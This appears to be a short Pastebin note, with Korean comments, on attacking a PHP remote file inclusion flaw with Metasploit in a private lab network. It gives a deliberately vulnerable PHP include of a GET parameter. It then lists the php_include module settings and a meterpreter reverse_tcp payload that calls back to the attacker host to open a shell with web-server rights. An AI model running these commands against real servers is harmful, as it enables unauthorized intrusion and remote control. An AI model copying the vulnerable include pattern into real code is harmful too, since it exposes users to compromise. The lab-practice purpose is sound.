Advertisement
zmnkh

metasploit web attack

Mar 24th, 2015
555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1.  
  2. <?php
  3. include ($_GET['hacker']);
  4. ?>
  5.  
  6. http://xxx.xxx.xx.xxx/test.php?hacker= 의 취약점을 이용한 것임
  7.  
  8.  
  9. use exploit/unix/webapp/php_include
  10.  
  11. set rhost 192.168.182.135
  12. set phpuri /test.php?hacker=XXpathXX (XXpathXX 에 데이터를 넣겠다)
  13. set srvhost 192.168.182.151
  14. set uripath /test (XXpathXX에 담길 정보)
  15.  
  16. show payloads
  17. set payload php/meterpreter/reverse_tcp
  18. set lhost 192.168.182.151
  19.  
  20. exploit
  21.  
  22. 성공하면
  23. meterpreter(shell)를 만난다.
  24.  
  25. ## 웹서버 실행권한으로 시스템에 접근 가능하다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement